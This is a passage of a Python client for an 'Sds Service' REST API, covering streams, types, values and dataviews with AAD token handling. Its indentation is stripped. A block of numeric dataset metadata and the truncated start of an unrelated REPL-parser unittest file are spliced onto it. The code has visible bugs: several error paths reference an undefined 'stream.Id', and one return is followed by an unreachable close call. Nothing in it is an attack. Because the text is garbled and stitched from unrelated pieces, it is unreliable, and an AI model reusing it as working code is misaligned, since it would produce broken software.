"""Tells Sds Service to delete the type specified by 'type_id'"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
response.close()
def getStreamView(self, namespace_id, streamView_id):
"""Retrieves the streamView specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def getStreamViewMap(self, namespace_id, streamView_id):
"""Retrieves the streamView map specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id) + "/Map",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamViewMap = SdsStreamViewMap.fromJson(json.loads(response.content))
response.close()
return streamViewMap
def getStreamViews(self, namespace_id, skip=0, count=100):
"""Retrieves a list of streamViews associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreamViews. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStreamView.fromJson(item))
response.close()
return results
def getOrCreateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.post(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def createOrUpdateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.put(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStreamView(self, namespace_id, streamView_id):
"""Tells Sds Service to delete the streamView with the specified 'streamView_id'"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
response.close()
def getStream(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def getStreamType(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id) + "/Type",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def getStreams(self, namespace_id, query="", skip=0, count=100):
"""Retrieves a list of streams associated with 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
if query is None:
raise TypeError
response = requests.get(
self.__url + self.__getStreamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, query=query, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreams. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStream.fromJson(item))
response.close()
return results
def getOrCreateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.post(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def createOrUpdateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.put(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStream(self, namespace_id, stream_id):
"""Tells Sds Service to delete the stream speficied by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def createOrUpdateTags(self, namespace_id, streamId, tags):
"""Tells Sds Service to create tags and associate them with the given streamId """
if namespace_id is None:
raise TypeError
response = requests.put(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Tags",
data=json.dumps(tags),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create tags for Stream: {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
def createOrUpdateMetadata(self, namespace_id, streamId, metadata):
"""Tells Sds Service to create metadata and associate them with the given streamId"""
if namespace_id is None:
raise TypeError
response = requests.put(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Metadata",
data=json.dumps(metadata),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create metadata for Stream: {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
def getTags(self, namespace_id, streamId):
"""Tells Sds Service to get tags associated with the given streamId """
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Tags",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get tags for Stream: {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
return content
def getMetadata(self, namespace_id, streamId, key):
"""Tells Sds Service to get metadata associated with the given streamId and key"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=streamId) + "/Metadata/" + key,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get metadata for Stream: {stream_id} and Key {key}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
return content
response.close()
# The following section provides functionality to interact with Data
# We assume the value(s) passed follow the Sds object patterns supporting fromJson and toJson method
def getValue(self, namespace_id, stream_id, index, value_class, streamView_id=""):
"""Retrieves JSON object from Sds Service for value specified by 'index' from Sds Service """
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if index is None:
raise TypeError
if value_class is None:
raise TypeError
response = requests.get(
self.__url + self.__getValueQuery.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, index=index, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get value for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return content
return value_class.fromJson(content)
def getFirstValue(self, namespace_id, stream_id, value_class, streamView_id=""):
"""Retrieves JSON object from Sds Service the first value to be added to the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getFirstValue.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get first value for SdsStream {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return content
return value_class.fromJson(content)
def getLastValue(self, namespace_id, stream_id, value_class, streamView_id=""):
"""Retrieves JSON object from Sds Service the last value to be added to the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getLastValue.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get last value for SdsStream {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return content
return value_class.fromJson(content)
def getWindowValues(self, namespace_id, stream_id, value_class, start, end, streamView_id=""):
"""Retrieves JSON object representing a window of values from the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if start is None:
raise TypeError
if end is None:
raise TypeError
response = requests.get(
self.__url + self.__getWindowValues.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
stream_id=stream_id, start=start, end=end, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get window values for SdsStream {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return content
values = []
for c in content:
values.append(value_class.fromDictionary(c))
return values
def getRangeValues(self, namespace_id, stream_id, value_class, start, skip, count, reverse, boundary_type, streamView_id=""):
"""Retrieves JSON object representing a range of values from the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if start is None:
raise TypeError
if skip is None:
raise TypeError
if count is None:
raise TypeError
if reverse is None or not isinstance(reverse, bool):
raise TypeError
if boundary_type is None or not isinstance(boundary_type, SdsBoundaryType):
raise TypeError
response = requests.get(
self.__url + self.__getRangeValuesQuery.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id,
stream_id=stream_id, start=start, skip=skip, count=count,
reverse=reverse, boundary_type=boundary_type.value,
streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get range of values from SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return content
values = []
for c in content:
values.append(value_class.fromJson(c))
return values
def insertValue(self, namespace_id, stream_id, value):
"""Tells Sds Service to insert a value, described by the local object 'value', into
the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if value is None:
raise TypeError
if callable(getattr(value, "toJson", None)):
payload = value.toJson()
else:
payload = value
response = requests.post(
self.__url + self.__insertValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to insert value for SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def insertValues(self, namespace_id, stream_id, values):
"""Tells Sds Service to insert the values, defined by the list 'values', into
the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if values is None:
raise TypeError
if callable(getattr(values[0], "toJson", None)):
events = []
for value in values:
events.append(value.toDictionary())
payload = json.dumps(events)
else:
payload = values
response = requests.post(
self.__url + self.__insertValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
raise SdsError("Failed to insert multiple values for SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
def updateValue(self, namespace_id, stream_id, value):
"""Tells Sds Service to update the value described by 'value', a local SdsValue object"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if value is None:
raise TypeError
if callable(getattr(value, "toJson", None)):
payload = value.toJson()
else:
payload = value
response = requests.put(self.__url + self.__updateValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to update value for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def updateValues(self, namespace_id, stream_id, values):
"""Tells Sds Service to update values defined by the SdsValue list, 'values'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if values is None:
raise TypeError
if callable(getattr(values[0], "toJson", None)):
events = []
for value in values:
events.append(value.toDictionary())
payload = json.dumps(events)
else:
payload = values
response = requests.put(self.__url + self.__updateValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to update all values for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def replaceValue(self, namespace_id, stream_id, value):
"""Tells Sds Service to replace the value specified by 'value'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if value is None:
raise TypeError
if callable(getattr(value, "toJson", None)):
payload = value.toJson()
else:
payload = value
response = requests.put(
self.__url + self.__replaceValuePath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to replace value for SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def replaceValues(self, namespace_id, stream_id, values):
"""Tells Sds Service to replace the values defined by the list 'values'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if values is None:
raise TypeError
if callable(getattr(values[0], "toJson", None)):
events = []
for value in values:
events.append(value.toDictionary())
payload = json.dumps(events)
else:
payload = values
response = requests.put(
self.__url + self.__replaceValuesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
data=payload,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to replace value for SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def removeValue(self, namespace_id, stream_id, key):
"""Tells Sds Service to delete the value with a key property matching 'key'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if key is None:
raise TypeError
response = requests.delete(
self.__url + self.__removeValue.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, index=key),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to remove value for SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def removeWindowValues(self, namespace_id, stream_id, start, end):
"""Tells Sds Service to delete a window of values in the stream specified by 'stream_id'"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
if start is None:
raise TypeError
if end is None:
raise TypeError
response = requests.delete(
self.__url + self.__removeWindowValues.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id, start=start, end=end),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to remove all values for SdsStream, {stream_id}. {status}:{reason}".format(stream_id=stream_id, status=response.status_code, reason=response.text))
response.close()
def postDataview(self, namespace_id, dataview):
"""Tells Sds Service to create a dataview based on local 'dataview' or get if existing dataview matches"""
if namespace_id is None:
raise TypeError
if dataview is None or not isinstance(dataview, Dataview):
raise TypeError
response = requests.post(
self.__url + self.__dataviewPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview.Id),
data=dataview.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create dataview, {dataview_id}. {status}:{reason}".format(dataview_id=dataview.Id, status=response.status_code, reason=response.text))
dataview = Dataview.fromJson(json.loads(response.content))
response.close()
return dataview
def patchDataview(self, namespace_id, dataview):
"""Tells Sds Service to update a dataview based on local 'dataview'"""
if namespace_id is None:
raise TypeError
if dataview is None or not isinstance(dataview, Dataview):
raise TypeError
response = requests.patch(
self.__url + self.__dataviewPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview.Id),
data=dataview.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to update dataview, {dataview_id}. {status}:{reason}".format(dataview_id=dataview.Id, status=response.status_code, reason=response.text))
dataview = Dataview.fromJson(json.loads(response.content))
response.close()
return dataview
def deleteDataview(self, namespace_id, dataview_id):
"""Tells Sds Service to delete a dataview based on 'dataview_id'"""
if namespace_id is None:
raise TypeError
if dataview_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__dataviewPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to delete dataview, {dataview_id}. {status}:{reason}".format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
response.close()
return
def getDataview(self, namespace_id, dataview_id):
"""Retrieves the dataview specified by 'dataview_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if dataview_id is None:
raise TypeError
response = requests.get(
self.__url + self.__dataviewPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get dataview, {dataview_id}. {status}:{reason}".
format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
dataview = Dataview.fromJson(json.loads(response.content))
response.close()
return dataview
def getDataviews(self, namespace_id, skip = 0, count =100):
"""Retrieves all of the dataviews from Sds Service"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getDataviews.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get dataviews. {status}:{reason}".
format( status=response.status_code, reason=response.text))
dataviews = json.loads(response.content)
results = []
for t in dataviews:
results.append(Dataview.fromJson(t))
response.close()
return results
def getDatagroups(self, namespace_id,dataview_id, skip = 0, count = 100):
"""Retrieves all of the datagroups from the specified dataview from Sds Service"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getDatagroups.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get datagroups for dataview, . {status}:{reason}".
format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
datagroups = json.loads(response.content)
results = {}
for key, value in datagroups.iteritems():
innerobj = {}
for key2, value2 in value.iteritems():
innerobj[key2] = Datagroup.fromJson(value2)
results[key] = innerobj
response.close()
return results
def getDatagroup(self, namespace_id,dataview_id, datagroup_id):
"""Retrieves a datagroupby 'datagroup_id' from the specified dataview from Sds Service"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getDatagroup.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview_id, datagroup_id=datagroup_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get datagroup for dataview, . {status}:{reason}".
format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
datagroup = Datagroup.fromJson(json.loads(response.content))
return datagroup
#needs other parameters with smart
def getDataviewPreview(self, namespace_id, dataview_id, startIndex = None, endIndex = None, interval = None, form = None, count = -1, value_class = None):
"""Retrieves the dataviewpreview of the 'dataview_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if dataview_id is None:
raise TypeError
urlAdd = []
urlAddStr = ""
if startIndex is not None:
urlAdd.append("startIndex=" +startIndex)
if endIndex is not None:
urlAdd.append("endIndex=" +endIndex)
if interval is not None:
urlAdd.append("interval=" +interval)
if form is not None:
urlAdd.append("form=" +form)
if count != -1:
urlAdd.append("count=" + str(count))
if len(urlAdd) != 0:
urlAddStr = "?" + '&'.join(str(x) for x in urlAdd)
response = requests.get(
self.__url + self.__getDataviewPreview.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, dataview_id=dataview_id) + urlAddStr,
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get dataview preview for dataview {dataview_id}. {status}:{reason}".
format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
content = json.loads(response.content)
response.close()
if value_class is None:
return (content)
return value_class.fromJson(content)
# private methods
def __getToken(self):
if ((self.__expiration - time.time()) > 5 * 60):
return self.__token
context = adal.AuthenticationContext(self.__authority, validate_authority=True)
token = context.acquire_token_with_client_credentials(self.__resource, self.__clientId, self.__clientSecret)
if token is None:
raise Exception("Failed to retrieve AAD Token")
self.__expiration = float(token['expiresIn']) + time.time()
self.__token = token['accessToken']
return self.__token
def __sdsHeaders(self):
return {"Authorization": "bearer %s" % self.__getToken(),
"Content-type": "application/json",
"Accept": "*/*; q=1"
}
def __validateUri(self, url):
splitUri = urlparse(url)
return splitUri.netloc + splitUri.path
def __setPathAndQueryTemplates(self):
self.__basePath = "/api/{api_version}/Tenants/{tenant_id}/Namespaces/{namespace_id}"
self.__typesPath = self.__basePath + "/Types/{type_id}"
self.__getTypesPath = self.__basePath + "/Types?skip={skip}&count={count}"
self.__behaviorsPath = self.__basePath + "/Behaviors/{behavior_id}"
self.__getBehaviorsPath = self.__basePath + "/Behaviors?skip={skip}&count={count}"
self.__streamViewsPath = self.__basePath + "/StreamViews/{streamView_id}"
self.__getStreamViewsPath = self.__basePath + "/StreamViews?skip={skip}&count={count}"
self.__streamsPath = self.__basePath + "/Streams/{stream_id}"
self.__getStreamsPath = self.__basePath + "/Streams?query={query}&skip={skip}&count={count}"
self.__dataPath = self.__basePath + "/Streams/{stream_id}/Data"
self.__getValueQuery = self.__dataPath + "/GetValue?index={index}&streamViewId={streamView_id}"
self.__getFirstValue = self.__dataPath + "/GetFirstValue?streamViewId={streamView_id}"
self.__getLastValue = self.__dataPath + "/GetLastValue?streamViewId={streamView_id}"
self.__getWindowValues = self.__dataPath + "/GetWindowValues?startIndex={start}&endIndex={end}&streamViewId={streamView_id}"
self.__getRangeValuesQuery = self.__dataPath + "/GetRangeValues?startIndex={start}&skip={skip}&count={count}&reversed={reverse}&boundaryType={boundary_type}&streamViewId={streamView_id}"
self.__insertValuePath = self.__dataPath + "/InsertValue"
self.__insertValuesPath = self.__dataPath + "/InsertValues"
self.__updateValuePath = self.__dataPath + "/UpdateValue"
self.__updateValuesPath = self.__dataPath + "/UpdateValues"
self.__replaceValuePath = self.__dataPath + "/ReplaceValue"
self.__replaceValuesPath = self.__dataPath + "/ReplaceValues"
self.__removeValue = self.__dataPath + "/RemoveValue?index={index}"
self.__removeWindowValues = self.__dataPath + "/RemoveWindowValues?startIndex={start}&endIndex={end}"
self.__dataviewsPath = self.__basePath + "/Dataviews"
self.__getDataviews= self.__dataviewsPath + "?skip={skip}&count={count}"
self.__dataviewPath = self.__dataviewsPath + "/{dataview_id}"
self.__datagroupPath= self.__dataviewPath + "/Datagroups"
self.__getDatagroup = self.__datagroupPath + "/{datagroup_id}"
self.__getDatagroups = self.__datagroupPath + "?skip={skip}&count={count}"
self.__getDataviewPreview = self.__dataviewPath + "/preview/interpolated"
| 46.238777
| 199
| 0.644964
| 5,488
| 48,412
| 5.453171
| 0.063411
| 0.064691
| 0.077589
| 0.056805
| 0.804224
| 0.773181
| 0.760517
| 0.744111
| 0.72757
| 0.724563
| 0
| 0.008889
| 0.263385
| 48,412
| 1,046
| 200
| 46.282983
| 0.830319
| 0.015616
| 0
| 0.71161
| 0
| 0.001248
| 0.088383
| 0.018191
| 0.001248
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01623
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
401eb27cae97f4e983d54e78fbaee0f118ab255c
| 4,539
|
py
|
Python
|
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
import unittest
from repl import lexems
from repl.lexer import Token
from repl.parser import Parser
class Test_Parser(unittest.TestCase):
def test_adding(self):
parser = Parser()
tree = parser.run("1 + 7")
self.assertEqual(tree.op, Token(lexems.PLUS, lexems.PLUS))
self.assertEqual(tree.left.val, Token(lexems.DIGIT, 1))
self.assertEqual(tree.right.val, Token(lexems.DIGIT, 7))
def test_multiply(self):
parser = Parser()
tree = parser.run("1 + 7 * 5")
self.assertEqual(tree.op, Token(lexems.PLUS, lexems.PLUS))
self.assertEqual(tree.left.val, Token(lexems.DIGIT, 1.0))
def test_brackets(self):
parser = Parser()
tree = parser.run("(1 + 7) * 5")
self.assertEqual(tree.op, Token(lexems.MULTIPLY, lexems.MULTIPLY))
self.assertEqual(tree.right.val, Token(lexems.DIGIT, 5.0))
def test_assignment(self):
parser = Parser()
